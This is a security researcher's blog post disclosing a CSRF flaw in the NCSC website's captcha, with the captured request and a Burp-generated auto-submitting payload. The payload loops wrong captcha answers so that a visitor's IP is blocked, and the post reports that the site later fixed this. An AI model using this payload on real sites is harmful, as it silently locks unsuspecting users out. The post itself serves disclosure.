Blocking Access to via CSRF

Blocking Access to via CSRF

I Spider-ed the website... and was shortly met with this:
How Rude.

I thought Hmm, 5 Requests ?, Looks like a home-made Captcha... let me take a look.

I know NCSC are better than that.

The Problem

This isn't a huge issue, but it's worth highlighting just because it's NCSC, lead by example and all that.

This is what the Captcha submission looks like...

POST /captcha_resp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: BNIS_x-bni-jas=zpZf1re4sUBSMhU-9cca4FYNM8-HX9qeqxfEjcJ8vKU=; AWSELB=AB19F9210C0AF8A76886DB45AF60D61D2095B2F380E4FD79F740F206063DDFC9EFC95BC5411F8E2B32716592E805CE4F4BF753668E91C642E6B47DAD63074B3525806A5E91; has_js=1; _pk_id.4.131f=f9f43afcecd36885.1478612347.1.1478612497.1478612347.; _pk_ses.4.131f=*; cookie-agreed=2; x-bni-ci=N3UI-a8CH74VKK-1_vOOIlnF9pDByL4tYEJtZUuXypWCq7rF1hDLUA==
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 22


Incase you missed it captcha_resp_txt=aaxsx is the problem here and the request has no actionable session control to make the request unique ... so we can do this, create a CSRF to send 'something' on load, then 2 seconds later, reload the page, to create a loop in the client browser, after a certain number of failed attempts by the unsuspecting user, they will be blocked within a matter of seconds, jolly bad.

The Payload

This will automatically send the wrong captcha on load then 2 seconds later reload the page to send the wrong data over and over, thus locking the user for failing to submit the right challeng, this can happen in the background, obviously unsuspecting to the user, how ever you deliver the csrf attacks is up to you, but the fix is still the same

For this I used Burpsuite Pro's CSRF generator, with auto-submit on load, and a 2 second refresh of the page using the meta tag, a very basic loop, for my very basic coding skills.

  <meta http-equiv="refresh" content="2" />
      function submitRequest()
        var xhr = new XMLHttpRequest();"POST", "", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.withCredentials = true;
        var body = "captcha_resp_txt=n0x00";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));


Below you can see in my Chrome Browser that the site now says the site is down for maintenance, but accessing the same address via google language translate I can have google behave as a transparent proxy to fetch the pages for me, I can see it's not down for maintenance, but that's a rule for my IP Address on the network that has failed to satisfy the CAPTCHA as per it's requirements

== Fixed! ==

The Web Team at turned this around super quick, they rolled out Cloudflare (looking at the new cookies)this will afford them all the controls and defences cloud flare has to offer, good move, I'm not sure there is a non-commercial tool/method that can parallel this for those without a budget for defence, but cloudlfare is good, discouraging for hackers and easy to use, ... I'll shut up because I'm sounding like a salesman.



I asked NSCS "What is the NCSC’s stance on vulnerability disclosure of issues on their site? (and others ?)" - I'm not sure they are in a position to answer it but if they are it would be good to hear what they say.